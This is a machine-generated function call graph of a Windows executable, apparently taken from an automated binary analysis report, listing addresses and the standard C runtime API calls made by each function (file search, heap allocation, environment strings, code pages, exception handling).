10 API calls 16045->16048 16049 7ff67d0155c4 _findclose 11 API calls 16046->16049 16047->16037 16050 7ff67d018180 16048->16050 16049->16037 16051 7ff67d020f54 _wfindfirst32i64 37 API calls 16050->16051 16052 7ff67d01819e 16051->16052 16052->16037 16053 7ff67d0181a6 16052->16053 16054 7ff67d01afc4 _wfindfirst32i64 17 API calls 16053->16054 16055 7ff67d0181ba 16054->16055 16057 7ff67d0181da FileTimeToSystemTime 16056->16057 16058 7ff67d0181d4 16056->16058 16059 7ff67d0181e9 SystemTimeToTzSpecificLocalTime 16057->16059 16060 7ff67d0181ff 16057->16060 16058->16057 16058->16060 16059->16060 16061 7ff67d00bdc0 _wfindfirst32i64 8 API calls 16060->16061 16062 7ff67d018039 16061->16062 16062->16011 16064 7ff67d020f61 16063->16064 16067 7ff67d020f6b 16063->16067 16064->16067 16070 7ff67d020f87 16064->16070 16065 7ff67d0155c4 _findclose 11 API calls 16066 7ff67d020f73 16065->16066 16068 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 16066->16068 16067->16065 16069 7ff67d018073 16068->16069 16069->16009 16069->16024 16070->16069 16071 7ff67d0155c4 _findclose 11 API calls 16070->16071 16071->16066 15187 7ff67d021038 15188 7ff67d02105c 15187->15188 15191 7ff67d02106c 15187->15191 15338 7ff67d0155c4 15188->15338 15190 7ff67d02134c 15193 7ff67d0155c4 _findclose 11 API calls 15190->15193 15191->15190 15192 7ff67d02108e 15191->15192 15194 7ff67d0210af 15192->15194 15341 7ff67d0216f4 15192->15341 15195 7ff67d021351 15193->15195 15198 7ff67d021121 15194->15198 15200 7ff67d0210d5 15194->15200 15205 7ff67d021115 15194->15205 15197 7ff67d01b00c __free_lconv_mon 11 API calls 15195->15197 15209 7ff67d021061 15197->15209 15202 7ff67d01f258 _findclose 11 API calls 15198->15202 15219 7ff67d0210e4 15198->15219 15199 7ff67d0211ce 15208 7ff67d0211eb 15199->15208 15216 7ff67d02123d 15199->15216 15356 7ff67d019d50 15200->15356 15206 7ff67d021137 15202->15206 15205->15199 15205->15219 15368 7ff67d027afc 15205->15368 15210 7ff67d01b00c __free_lconv_mon 11 API calls 15206->15210 15213 7ff67d01b00c __free_lconv_mon 11 API calls 15208->15213 15214 7ff67d021145 15210->15214 15211 7ff67d0210fd 15211->15205 15218 7ff67d0216f4 45 API calls 15211->15218 15212 7ff67d0210df 15215 7ff67d0155c4 _findclose 11 API calls 15212->15215 15217 7ff67d0211f4 15213->15217 15214->15205 15214->15219 15222 7ff67d01f258 _findclose 11 API calls 15214->15222 15215->15219 15216->15219 15220 7ff67d023b4c 40 API calls 15216->15220 15228 7ff67d0211f9 15217->15228 15404 7ff67d023b4c 15217->15404 15218->15205 15362 7ff67d01b00c 15219->15362 15221 7ff67d02127a 15220->15221 15224 7ff67d01b00c __free_lconv_mon 11 API calls 15221->15224 15223 7ff67d021167 15222->15223 15226 7ff67d01b00c __free_lconv_mon 11 API calls 15223->15226 15227 7ff67d021284 15224->15227 15226->15205 15227->15219 15227->15228 15229 7ff67d021340 15228->15229 15318 7ff67d01f258 15228->15318 15231 7ff67d01b00c __free_lconv_mon 11 API calls 15229->15231 15230 7ff67d021225 15232 7ff67d01b00c __free_lconv_mon 11 API calls 15230->15232 15231->15209 15232->15228 15235 7ff67d0212d9 15325 7ff67d01ab3c 15235->15325 15236 7ff67d0212d0 15238 7ff67d01b00c __free_lconv_mon 11 API calls 15236->15238 15239 7ff67d0212d7 15238->15239 15245 7ff67d01b00c __free_lconv_mon 11 API calls 15239->15245 15241 7ff67d02137b 15334 7ff67d01afc4 IsProcessorFeaturePresent 15241->15334 15242 7ff67d0212f0 15413 7ff67d027c14 15242->15413 15245->15209 15248 7ff67d021317 15252 7ff67d0155c4 _findclose 11 API calls 15248->15252 15249 7ff67d021338 15251 7ff67d01b00c __free_lconv_mon 11 API calls 15249->15251 15251->15229 15254 7ff67d02131c 15252->15254 15258 7ff67d01b00c __free_lconv_mon 11 API calls 15254->15258 15258->15239 15323 7ff67d01f269 _findclose 15318->15323 15319 7ff67d01f2ba 15322 7ff67d0155c4 _findclose 10 API calls 15319->15322 15320 7ff67d01f29e RtlAllocateHeap 15321 7ff67d01f2b8 15320->15321 15320->15323 15321->15235 15321->15236 15322->15321 15323->15319 15323->15320 15432 7ff67d023d00 15323->15432 15326 7ff67d01ab49 15325->15326 15327 7ff67d01ab53 15325->15327 15326->15327 15332 7ff67d01ab6e 15326->15332 15328 7ff67d0155c4 _findclose 11 API calls 15327->15328 15329 7ff67d01ab5a 15328->15329 15441 7ff67d01afa4 15329->15441 15331 7ff67d01ab66 15331->15241 15331->15242 15332->15331 15333 7ff67d0155c4 _findclose 11 API calls 15332->15333 15333->15329 15335 7ff67d01afd7 15334->15335 15500 7ff67d01acd8 15335->15500 15522 7ff67d01b988 GetLastError 15338->15522 15340 7ff67d0155cd 15340->15209 15342 7ff67d021729 15341->15342 15349 7ff67d021711 15341->15349 15343 7ff67d01f258 _findclose 11 API calls 15342->15343 15344 7ff67d02174d 15343->15344 15345 7ff67d0217ae 15344->15345 15350 7ff67d01f258 _findclose 11 API calls 15344->15350 15351 7ff67d01b00c __free_lconv_mon 11 API calls 15344->15351 15352 7ff67d01ab3c __std_exception_copy 37 API calls 15344->15352 15353 7ff67d0217bd 15344->15353 15355 7ff67d0217d2 15344->15355 15348 7ff67d01b00c __free_lconv_mon 11 API calls 15345->15348 15348->15349 15349->15194 15350->15344 15351->15344 15352->15344 15354 7ff67d01afc4 _wfindfirst32i64 17 API calls 15353->15354 15354->15355 15539 7ff67d01ab9c 15355->15539 15357 7ff67d019d69 15356->15357 15358 7ff67d019d60 15356->15358 15357->15211 15357->15212 15358->15357 15605 7ff67d019828 15358->15605 15363 7ff67d01b011 RtlDeleteBoundaryDescriptor 15362->15363 15365 7ff67d01b040 15362->15365 15364 7ff67d01b02c GetLastError 15363->15364 15363->15365 15366 7ff67d01b039 __free_lconv_mon 15364->15366 15365->15209 15367 7ff67d0155c4 _findclose 9 API calls 15366->15367 15367->15365 15369 7ff67d027b09 15368->15369 15370 7ff67d026cac 15368->15370 15372 7ff67d015098 45 API calls 15369->15372 15371 7ff67d026cb9 15370->15371 15379 7ff67d026cef 15370->15379 15374 7ff67d0155c4 _findclose 11 API calls 15371->15374 15392 7ff67d026c60 15371->15392 15373 7ff67d027b3d 15372->15373 15376 7ff67d027b42 15373->15376 15380 7ff67d027b53 15373->15380 15384 7ff67d027b6a 15373->15384 15377 7ff67d026cc3 15374->15377 15375 7ff67d026d19 15378 7ff67d0155c4 _findclose 11 API calls 15375->15378 15376->15205 15381 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15377->15381 15382 7ff67d026d1e 15378->15382 15379->15375 15383 7ff67d026d3e 15379->15383 15385 7ff67d0155c4 _findclose 11 API calls 15380->15385 15386 7ff67d026cce 15381->15386 15387 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15382->15387 15388 7ff67d015098 45 API calls 15383->15388 15395 7ff67d026d29 15383->15395 15390 7ff67d027b86 15384->15390 15391 7ff67d027b74 15384->15391 15389 7ff67d027b58 15385->15389 15386->15205 15387->15395 15388->15395 15396 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15389->15396 15393 7ff67d027b97 15390->15393 15394 7ff67d027bae 15390->15394 15397 7ff67d0155c4 _findclose 11 API calls 15391->15397 15392->15205 15898 7ff67d026cfc 15393->15898 15907 7ff67d029924 15394->15907 15395->15205 15396->15376 15400 7ff67d027b79 15397->15400 15402 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15400->15402 15402->15376 15403 7ff67d0155c4 _findclose 11 API calls 15403->15376 15405 7ff67d023b8b 15404->15405 15406 7ff67d023b6e 15404->15406 15408 7ff67d023b95 15405->15408 15947 7ff67d028608 15405->15947 15406->15405 15407 7ff67d023b7c 15406->15407 15409 7ff67d0155c4 _findclose 11 API calls 15407->15409 15954 7ff67d020fbc 15408->15954 15412 7ff67d023b81 __scrt_get_show_window_mode 15409->15412 15412->15230 15414 7ff67d015098 45 API calls 15413->15414 15415 7ff67d027c7a 15414->15415 15416 7ff67d027c88 15415->15416 15966 7ff67d01f4e4 15415->15966 15969 7ff67d015684 15416->15969 15420 7ff67d027d74 15423 7ff67d027d85 15420->15423 15424 7ff67d01b00c __free_lconv_mon 11 API calls 15420->15424 15421 7ff67d015098 45 API calls 15422 7ff67d027cf7 15421->15422 15426 7ff67d01f4e4 5 API calls 15422->15426 15429 7ff67d027d00 15422->15429 15425 7ff67d021313 15423->15425 15427 7ff67d01b00c __free_lconv_mon 11 API calls 15423->15427 15424->15423 15425->15248 15425->15249 15426->15429 15427->15425 15428 7ff67d015684 14 API calls 15430 7ff67d027d5b 15428->15430 15429->15428 15430->15420 15431 7ff67d027d63 SetEnvironmentVariableW 15430->15431 15431->15420 15435 7ff67d023d40 15432->15435 15440 7ff67d020db8 EnterCriticalSection 15435->15440 15443 7ff67d01ae3c 15441->15443 15444 7ff67d01ae67 15443->15444 15447 7ff67d01aed8 15444->15447 15446 7ff67d01ae8e 15455 7ff67d01ac20 15447->15455 15450 7ff67d01af13 15450->15446 15453 7ff67d01afc4 _wfindfirst32i64 17 API calls 15454 7ff67d01afa3 15453->15454 15456 7ff67d01ac77 15455->15456 15457 7ff67d01ac3c GetLastError 15455->15457 15456->15450 15461 7ff67d01ac8c 15456->15461 15458 7ff67d01ac4c 15457->15458 15464 7ff67d01ba50 15458->15464 15462 7ff67d01aca8 GetLastError SetLastError 15461->15462 15463 7ff67d01acc0 15461->15463 15462->15463 15463->15450 15463->15453 15465 7ff67d01ba8a FlsSetValue 15464->15465 15466 7ff67d01ba6f FlsGetValue 15464->15466 15467 7ff67d01ba97 15465->15467 15470 7ff67d01ac67 SetLastError 15465->15470 15468 7ff67d01ba84 15466->15468 15466->15470 15469 7ff67d01f258 _findclose 11 API calls 15467->15469 15468->15465 15471 7ff67d01baa6 15469->15471 15470->15456 15472 7ff67d01bac4 FlsSetValue 15471->15472 15473 7ff67d01bab4 FlsSetValue 15471->15473 15475 7ff67d01bad0 FlsSetValue 15472->15475 15476 7ff67d01bae2 15472->15476 15474 7ff67d01babd 15473->15474 15477 7ff67d01b00c __free_lconv_mon 11 API calls 15474->15477 15475->15474 15481 7ff67d01b5b8 15476->15481 15477->15470 15486 7ff67d01b490 15481->15486 15498 7ff67d020db8 EnterCriticalSection 15486->15498 15501 7ff67d01ad12 _wfindfirst32i64 __scrt_get_show_window_mode 15500->15501 15502 7ff67d01ad3a RtlCaptureContext RtlLookupFunctionEntry 15501->15502 15503 7ff67d01adaa IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15502->15503 15504 7ff67d01ad74 RtlVirtualUnwind 15502->15504 15505 7ff67d01adfc _wfindfirst32i64 15503->15505 15504->15503 15508 7ff67d00bdc0 15505->15508 15509 7ff67d00bdc9 15508->15509 15510 7ff67d00be20 IsProcessorFeaturePresent 15509->15510 15511 7ff67d00bdd4 GetCurrentProcess TerminateProcess 15509->15511 15512 7ff67d00be38 15510->15512 15517 7ff67d00c014 RtlCaptureContext 15512->15517 15518 7ff67d00c02e RtlLookupFunctionEntry 15517->15518 15519 7ff67d00be4b 15518->15519 15520 7ff67d00c044 RtlVirtualUnwind 15518->15520 15521 7ff67d00bde0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 15519->15521 15520->15518 15520->15519 15523 7ff67d01b9c9 FlsSetValue 15522->15523 15528 7ff67d01b9ac 15522->15528 15524 7ff67d01b9b9 15523->15524 15525 7ff67d01b9db 15523->15525 15526 7ff67d01ba35 SetLastError 15524->15526 15527 7ff67d01f258 _findclose 5 API calls 15525->15527 15526->15340 15529 7ff67d01b9ea 15527->15529 15528->15523 15528->15524 15530 7ff67d01ba08 FlsSetValue 15529->15530 15531 7ff67d01b9f8 FlsSetValue 15529->15531 15532 7ff67d01ba26 15530->15532 15533 7ff67d01ba14 FlsSetValue 15530->15533 15534 7ff67d01ba01 15531->15534 15535 7ff67d01b5b8 _findclose 5 API calls 15532->15535 15533->15534 15536 7ff67d01b00c __free_lconv_mon 5 API calls 15534->15536 15537 7ff67d01ba2e 15535->15537 15536->15524 15538 7ff67d01b00c __free_lconv_mon 5 API calls 15537->15538 15538->15526 15548 7ff67d023dc0 15539->15548 15574 7ff67d023d78 15548->15574 15579 7ff67d020db8 EnterCriticalSection 15574->15579 15606 7ff67d019841 15605->15606 15615 7ff67d01983d 15605->15615 15628 7ff67d022d60 15606->15628 15611 7ff67d01985f 15654 7ff67d01990c 15611->15654 15612 7ff67d019853 15613 7ff67d01b00c __free_lconv_mon 11 API calls 15612->15613 15613->15615 15615->15357 15620 7ff67d019b7c 15615->15620 15617 7ff67d01b00c __free_lconv_mon 11 API calls 15618 7ff67d019886 15617->15618 15619 7ff67d01b00c __free_lconv_mon 11 API calls 15618->15619 15619->15615 15621 7ff67d019ba5 15620->15621 15623 7ff67d019bbe 15620->15623 15621->15357 15622 7ff67d0205c8 WideCharToMultiByte 15622->15623 15623->15621 15623->15622 15624 7ff67d01f258 _findclose 11 API calls 15623->15624 15625 7ff67d019c4e 15623->15625 15627 7ff67d01b00c __free_lconv_mon 11 API calls 15623->15627 15624->15623 15626 7ff67d01b00c __free_lconv_mon 11 API calls 15625->15626 15626->15621 15627->15623 15629 7ff67d019846 15628->15629 15630 7ff67d022d6d 15628->15630 15634 7ff67d02309c GetEnvironmentStringsW 15629->15634 15673 7ff67d01b8e4 15630->15673 15635 7ff67d0230cc 15634->15635 15636 7ff67d01984b 15634->15636 15637 7ff67d0205c8 WideCharToMultiByte 15635->15637 15636->15611 15636->15612 15638 7ff67d02311d 15637->15638 15639 7ff67d023124 FreeEnvironmentStringsW 15638->15639 15640 7ff67d01dcbc _fread_nolock 12 API calls 15638->15640 15639->15636 15641 7ff67d023137 15640->15641 15642 7ff67d023148 15641->15642 15643 7ff67d02313f 15641->15643 15645 7ff67d0205c8 WideCharToMultiByte 15642->15645 15644 7ff67d01b00c __free_lconv_mon 11 API calls 15643->15644 15646 7ff67d023146 15644->15646 15647 7ff67d02316b 15645->15647 15646->15639 15648 7ff67d023179 15647->15648 15649 7ff67d02316f 15647->15649 15651 7ff67d01b00c __free_lconv_mon 11 API calls 15648->15651 15650 7ff67d01b00c __free_lconv_mon 11 API calls 15649->15650 15652 7ff67d023177 FreeEnvironmentStringsW 15650->15652 15651->15652 15652->15636 15656 7ff67d019931 15654->15656 15655 7ff67d01f258 _findclose 11 API calls 15668 7ff67d019967 15655->15668 15656->15655 15656->15656 15657 7ff67d01996f 15658 7ff67d01b00c __free_lconv_mon 11 API calls 15657->15658 15659 7ff67d019867 15658->15659 15659->15617 15660 7ff67d0199e2 15661 7ff67d01b00c __free_lconv_mon 11 API calls 15660->15661 15661->15659 15662 7ff67d01f258 _findclose 11 API calls 15662->15668 15663 7ff67d0199d1 15892 7ff67d019b38 15663->15892 15664 7ff67d01ab3c __std_exception_copy 37 API calls 15664->15668 15667 7ff67d019a07 15670 7ff67d01afc4 _wfindfirst32i64 17 API calls 15667->15670 15668->15657 15668->15660 15668->15662 15668->15663 15668->15664 15668->15667 15671 7ff67d01b00c __free_lconv_mon 11 API calls 15668->15671 15669 7ff67d01b00c __free_lconv_mon 11 API calls 15669->15657 15672 7ff67d019a1a 15670->15672 15671->15668 15674 7ff67d01b910 FlsSetValue 15673->15674 15675 7ff67d01b8f5 FlsGetValue 15673->15675 15677 7ff67d01b902 15674->15677 15678 7ff67d01b91d 15674->15678 15676 7ff67d01b90a 15675->15676 15675->15677 15676->15674 15679 7ff67d01b908 15677->15679 15680 7ff67d01ab9c __GetCurrentState 45 API calls 15677->15680 15681 7ff67d01f258 _findclose 11 API calls 15678->15681 15693 7ff67d022a34 15679->15693 15682 7ff67d01b985 15680->15682 15683 7ff67d01b92c 15681->15683 15684 7ff67d01b94a FlsSetValue 15683->15684 15685 7ff67d01b93a FlsSetValue 15683->15685 15687 7ff67d01b956 FlsSetValue 15684->15687 15688 7ff67d01b968 15684->15688 15686 7ff67d01b943 15685->15686 15690 7ff67d01b00c __free_lconv_mon 11 API calls 15686->15690 15687->15686 15689 7ff67d01b5b8 _findclose 11 API calls 15688->15689 15691 7ff67d01b970 15689->15691 15690->15677 15692 7ff67d01b00c __free_lconv_mon 11 API calls 15691->15692 15692->15679 15716 7ff67d022ca4 15693->15716 15695 7ff67d022a69 15731 7ff67d022734 15695->15731 15698 7ff67d022a86 15698->15629 15701 7ff67d022a9f 15702 7ff67d01b00c __free_lconv_mon 11 API calls 15701->15702 15702->15698 15703 7ff67d022aae 15703->15703 15745 7ff67d022ddc 15703->15745 15706 7ff67d022baa 15707 7ff67d0155c4 _findclose 11 API calls 15706->15707 15709 7ff67d022baf 15707->15709 15708 7ff67d022c05 15711 7ff67d022c6c 15708->15711 15756 7ff67d022564 15708->15756 15712 7ff67d01b00c __free_lconv_mon 11 API calls 15709->15712 15710 7ff67d022bc4 15710->15708 15713 7ff67d01b00c __free_lconv_mon 11 API calls 15710->15713 15715 7ff67d01b00c __free_lconv_mon 11 API calls 15711->15715 15712->15698 15713->15708 15715->15698 15717 7ff67d022cc7 15716->15717 15718 7ff67d022cd1 15717->15718 15771 7ff67d020db8 EnterCriticalSection 15717->15771 15720 7ff67d022d43 15718->15720 15723 7ff67d01ab9c __GetCurrentState 45 API calls 15718->15723 15720->15695 15724 7ff67d022d5b 15723->15724 15727 7ff67d022db2 15724->15727 15728 7ff67d01b8e4 50 API calls 15724->15728 15727->15695 15729 7ff67d022d9c 15728->15729 15730 7ff67d022a34 65 API calls 15729->15730 15730->15727 15772 7ff67d015098 15731->15772 15734 7ff67d022766 15736 7ff67d02276b GetACP 15734->15736 15737 7ff67d02277b 15734->15737 15735 7ff67d022754 GetOEMCP 15735->15737 15736->15737 15737->15698 15738 7ff67d01dcbc 15737->15738 15739 7ff67d01dd07 15738->15739 15743 7ff67d01dccb _findclose 15738->15743 15740 7ff67d0155c4 _findclose 11 API calls 15739->15740 15742 7ff67d01dd05 15740->15742 15741 7ff67d01dcee RtlAllocateHeap 15741->15742 15741->15743 15742->15701 15742->15703 15743->15739 15743->15741 15744 7ff67d023d00 _findclose 2 API calls 15743->15744 15744->15743 15746 7ff67d022734 47 API calls 15745->15746 15747 7ff67d022e09 15746->15747 15748 7ff67d022f5f 15747->15748 15749 7ff67d022e46 IsValidCodePage 15747->15749 15754 7ff67d022e60 __scrt_get_show_window_mode 15747->15754 15750 7ff67d00bdc0 _wfindfirst32i64 8 API calls 15748->15750 15749->15748 15752 7ff67d022e57 15749->15752 15751 7ff67d022ba1 15750->15751 15751->15706 15751->15710 15753 7ff67d022e86 GetCPInfo 15752->15753 15752->15754 15753->15748 15753->15754 15804 7ff67d02284c 15754->15804 15891 7ff67d020db8 EnterCriticalSection 15756->15891 15773 7ff67d0150b7 15772->15773 15774 7ff67d0150bc 15772->15774 15773->15734 15773->15735 15774->15773 15775 7ff67d01b810 __GetCurrentState 45 API calls 15774->15775 15776 7ff67d0150d7 15775->15776 15780 7ff67d01e044 15776->15780 15781 7ff67d01e059 15780->15781 15782 7ff67d0150fa 15780->15782 15781->15782 15788 7ff67d023a74 15781->15788 15784 7ff67d01e0b0 15782->15784 15785 7ff67d01e0d8 15784->15785 15786 7ff67d01e0c5 15784->15786 15785->15773 15786->15785 15801 7ff67d022dc0 15786->15801 15789 7ff67d01b810 __GetCurrentState 45 API calls 15788->15789 15790 7ff67d023a83 15789->15790 15791 7ff67d023ace 15790->15791 15800 7ff67d020db8 EnterCriticalSection 15790->15800 15791->15782 15802 7ff67d01b810 __GetCurrentState 45 API calls 15801->15802 15803 7ff67d022dc9 15802->15803 15805 7ff67d022889 GetCPInfo 15804->15805 15806 7ff67d02297f 15804->15806 15805->15806 15811 7ff67d02289c 15805->15811 15807 7ff67d00bdc0 _wfindfirst32i64 8 API calls 15806->15807 15809 7ff67d022a1e 15807->15809 15809->15748 15815 7ff67d0235b0 15811->15815 15816 7ff67d015098 45 API calls 15815->15816 15817 7ff67d0235f2 15816->15817 15835 7ff67d01fd00 15817->15835 15836 7ff67d01fd09 MultiByteToWideChar 15835->15836 15893 7ff67d019b3d 15892->15893 15897 7ff67d0199d9 15892->15897 15894 7ff67d019b66 15893->15894 15895 7ff67d01b00c __free_lconv_mon 11 API calls 15893->15895 15896 7ff67d01b00c __free_lconv_mon 11 API calls 15894->15896 15895->15893 15896->15897 15897->15669 15899 7ff67d026d19 15898->15899 15900 7ff67d026d30 15898->15900 15901 7ff67d0155c4 _findclose 11 API calls 15899->15901 15900->15899 15904 7ff67d026d3e 15900->15904 15902 7ff67d026d1e 15901->15902 15903 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15902->15903 15906 7ff67d026d29 15903->15906 15905 7ff67d015098 45 API calls 15904->15905 15904->15906 15905->15906 15906->15376 15908 7ff67d015098 45 API calls 15907->15908 15909 7ff67d029949 15908->15909 15912 7ff67d0295a0 15909->15912 15914 7ff67d0295ee 15912->15914 15913 7ff67d00bdc0 _wfindfirst32i64 8 API calls 15915 7ff67d027bd5 15913->15915 15916 7ff67d029675 15914->15916 15918 7ff67d029660 GetCPInfo 15914->15918 15921 7ff67d029679 15914->15921 15915->15376 15915->15403 15917 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15916->15917 15916->15921 15919 7ff67d02970d 15917->15919 15918->15916 15918->15921 15920 7ff67d01dcbc _fread_nolock 12 API calls 15919->15920 15919->15921 15922 7ff67d029744 15919->15922 15920->15922 15921->15913 15922->15921 15923 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15922->15923 15924 7ff67d0297b2 15923->15924 15925 7ff67d029894 15924->15925 15926 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15924->15926 15925->15921 15927 7ff67d01b00c __free_lconv_mon 11 API calls 15925->15927 15928 7ff67d0297d8 15926->15928 15927->15921 15928->15925 15929 7ff67d01dcbc _fread_nolock 12 API calls 15928->15929 15930 7ff67d029805 15928->15930 15929->15930 15930->15925 15931 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15930->15931 15932 7ff67d02987c 15931->15932 15933 7ff67d02989c 15932->15933 15934 7ff67d029882 15932->15934 15941 7ff67d01f528 15933->15941 15934->15925 15936 7ff67d01b00c __free_lconv_mon 11 API calls 15934->15936 15936->15925 15938 7ff67d01b00c __free_lconv_mon 11 API calls 15939 7ff67d0298db 15938->15939 15939->15921 15940 7ff67d01b00c __free_lconv_mon 11 API calls 15939->15940 15940->15921 15942 7ff67d01f2d0 __crtLCMapStringW 5 API calls 15941->15942 15943 7ff67d01f566 15942->15943 15944 7ff67d01f790 __crtLCMapStringW 5 API calls 15943->15944 15946 7ff67d01f56e 15943->15946 15945 7ff67d01f5d7 CompareStringW 15944->15945 15945->15946 15946->15938 15946->15939 15948 7ff67d02862a HeapSize 15947->15948 15949 7ff67d028611 15947->15949 15950 7ff67d0155c4 _findclose 11 API calls 15949->15950 15951 7ff67d028616 15950->15951 15952 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 15951->15952 15953 7ff67d028621 15952->15953 15953->15408 15955 7ff67d020fdb 15954->15955 15956 7ff67d020fd1 15954->15956 15958 7ff67d020fe0 15955->15958 15964 7ff67d020fe7 _findclose 15955->15964 15957 7ff67d01dcbc _fread_nolock 12 API calls 15956->15957 15963 7ff67d020fd9 15957->15963 15959 7ff67d01b00c __free_lconv_mon 11 API calls 15958->15959 15959->15963 15960 7ff67d02101a HeapReAlloc 15960->15963 15960->15964 15961 7ff67d020fed 15962 7ff67d0155c4 _findclose 11 API calls 15961->15962 15962->15963 15963->15412 15964->15960 15964->15961 15965 7ff67d023d00 _findclose 2 API calls 15964->15965 15965->15964 15967 7ff67d01f2d0 __crtLCMapStringW 5 API calls 15966->15967 15968 7ff67d01f504 15967->15968 15968->15416 15970 7ff67d0156ae 15969->15970 15971 7ff67d0156d2 15969->15971 15975 7ff67d01b00c __free_lconv_mon 11 API calls 15970->15975 15977 7ff67d0156bd 15970->15977 15972 7ff67d0156d7 15971->15972 15973 7ff67d01572c 15971->15973 15972->15977 15978 7ff67d01b00c __free_lconv_mon 11 API calls 15972->15978 15983 7ff67d0156ec 15972->15983 15974 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15973->15974 15976 7ff67d015748 15974->15976 15975->15977 15980 7ff67d01574f GetLastError 15976->15980 15982 7ff67d01578a 15976->15982 15985 7ff67d01577d 15976->15985 15988 7ff67d01b00c __free_lconv_mon 11 API calls 15976->15988 15977->15420 15977->15421 15978->15983 15979 7ff67d01dcbc _fread_nolock 12 API calls 15979->15977 15991 7ff67d015538 15980->15991 15982->15977 15986 7ff67d01fd00 _fread_nolock MultiByteToWideChar 15982->15986 15983->15979 15989 7ff67d01dcbc _fread_nolock 12 API calls 15985->15989 15990 7ff67d0157ce 15986->15990 15987 7ff67d0155c4 _findclose 11 API calls 15987->15977 15988->15985 15989->15982 15990->15977 15990->15980 15992 7ff67d01b988 _findclose 11 API calls 15991->15992 15993 7ff67d015545 __free_lconv_mon 15992->15993 15994 7ff67d01b988 _findclose 11 API calls 15993->15994 15995 7ff67d015567 15994->15995 15995->15987 18917 7ff67d00b340 18918 7ff67d00b36e 18917->18918 18919 7ff67d00b355 18917->18919 18919->18918 18921 7ff67d01dcbc 12 API calls 18919->18921 18920 7ff67d00b3cc 18921->18920 18862 7ff67d01fdec 18863 7ff67d01ffde 18862->18863 18865 7ff67d01fe2e _isindst 18862->18865 18864 7ff67d0155c4 _findclose 11 API calls 18863->18864 18882 7ff67d01ffce 18864->18882 18865->18863 18868 7ff67d01feae _isindst 18865->18868 18866 7ff67d00bdc0 _wfindfirst32i64 8 API calls 18867 7ff67d01fff9 18866->18867 18883 7ff67d026a04 18868->18883 18873 7ff67d02000a 18874 7ff67d01afc4 _wfindfirst32i64 17 API calls 18873->18874 18876 7ff67d02001e 18874->18876 18880 7ff67d01ff0b 18880->18882 18908 7ff67d026a48 18880->18908 18882->18866 18884 7ff67d01fecc 18883->18884 18885 7ff67d026a13 18883->18885 18890 7ff67d025e08 18884->18890 18915 7ff67d020db8 EnterCriticalSection 18885->18915 18891 7ff67d025e11 18890->18891 18892 7ff67d01fee1 18890->18892 18893 7ff67d0155c4 _findclose 11 API calls 18891->18893 18892->18873 18896 7ff67d025e38 18892->18896 18894 7ff67d025e16 18893->18894 18895 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 18894->18895 18895->18892 18897 7ff67d025e41 18896->18897 18898 7ff67d01fef2 18896->18898 18899 7ff67d0155c4 _findclose 11 API calls 18897->18899 18898->18873 18902 7ff67d025e68 18898->18902 18900 7ff67d025e46 18899->18900 18901 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 18900->18901 18901->18898 18903 7ff67d01ff03 18902->18903 18904 7ff67d025e71 18902->18904 18903->18873 18903->18880 18905 7ff67d0155c4 _findclose 11 API calls 18904->18905 18906 7ff67d025e76 18905->18906 18907 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 18906->18907 18907->18903 18916 7ff67d020db8 EnterCriticalSection 18908->18916 18922 7ff67d019ff1 18923 7ff67d01aa68 45 API calls 18922->18923 18924 7ff67d019ff6 18923->18924 18925 7ff67d01a067 18924->18925 18926 7ff67d01a01d GetModuleHandleW 18924->18926 18934 7ff67d019ef4 18925->18934 18926->18925 18932 7ff67d01a02a 18926->18932 18932->18925 18948 7ff67d01a118 GetModuleHandleExW 18932->18948 18954 7ff67d020db8 EnterCriticalSection 18934->18954 18949 7ff67d01a14c GetProcAddress 18948->18949 18950 7ff67d01a175 18948->18950 18951 7ff67d01a15e 18949->18951 18952 7ff67d01a17a FreeLibrary 18950->18952 18953 7ff67d01a181 18950->18953 18951->18950 18952->18953 18953->18925 18965 7ff67d00b5f0 18966 7ff67d00b613 18965->18966 18967 7ff67d00b62f memcpy_s 18965->18967 18968 7ff67d01dcbc 12 API calls 18966->18968 18968->18967 19102 7ff67d02aa6e 19103 7ff67d02aa7e 19102->19103 19106 7ff67d015478 LeaveCriticalSection 19103->19106 19400 7ff67d02abf4 19403 7ff67d015478 LeaveCriticalSection 19400->19403 19414 7ff67d01a3e0 19417 7ff67d01a35c 19414->19417 19424 7ff67d020db8 EnterCriticalSection 19417->19424 19425 7ff67d01cbe0 19436 7ff67d020db8 EnterCriticalSection 19425->19436 19146 7ff67d02ac89 19147 7ff67d02ac98 19146->19147 19149 7ff67d02aca2 19146->19149 19150 7ff67d020e18 LeaveCriticalSection 19147->19150 19165 7ff67d00c090 19166 7ff67d00c0a0 19165->19166 19182 7ff67d01a238 19166->19182 19168 7ff67d00c0ac 19188 7ff67d00c398 19168->19188 19170 7ff67d00c119 19171 7ff67d00c67c 7 API calls 19170->19171 19181 7ff67d00c135 19170->19181 19173 7ff67d00c145 19171->19173 19172 7ff67d00c0c4 _RTC_Initialize 19172->19170 19193 7ff67d00c548 19172->19193 19175 7ff67d00c0d9 19196 7ff67d0196a4 19175->19196 19183 7ff67d01a249 19182->19183 19184 7ff67d01a251 19183->19184 19185 7ff67d0155c4 _findclose 11 API calls 19183->19185 19184->19168 19186 7ff67d01a260 19185->19186 19187 7ff67d01afa4 _invalid_parameter_noinfo 37 API calls 19186->19187 19187->19184 19189 7ff67d00c3a9 19188->19189 19192 7ff67d00c3ae __scrt_release_startup_lock 19188->19192 19190 7ff67d00c67c 7 API calls 19189->19190 19189->19192 19191 7ff67d00c422 19190->19191 19192->19172 19221 7ff67d00c50c 19193->19221 19195 7ff67d00c551 19195->19175 19197 7ff67d0196c4 19196->19197 19219 7ff67d00c0e5 19196->19219 19198 7ff67d0196cc 19197->19198 19199 7ff67d0196e2 GetModuleFileNameW 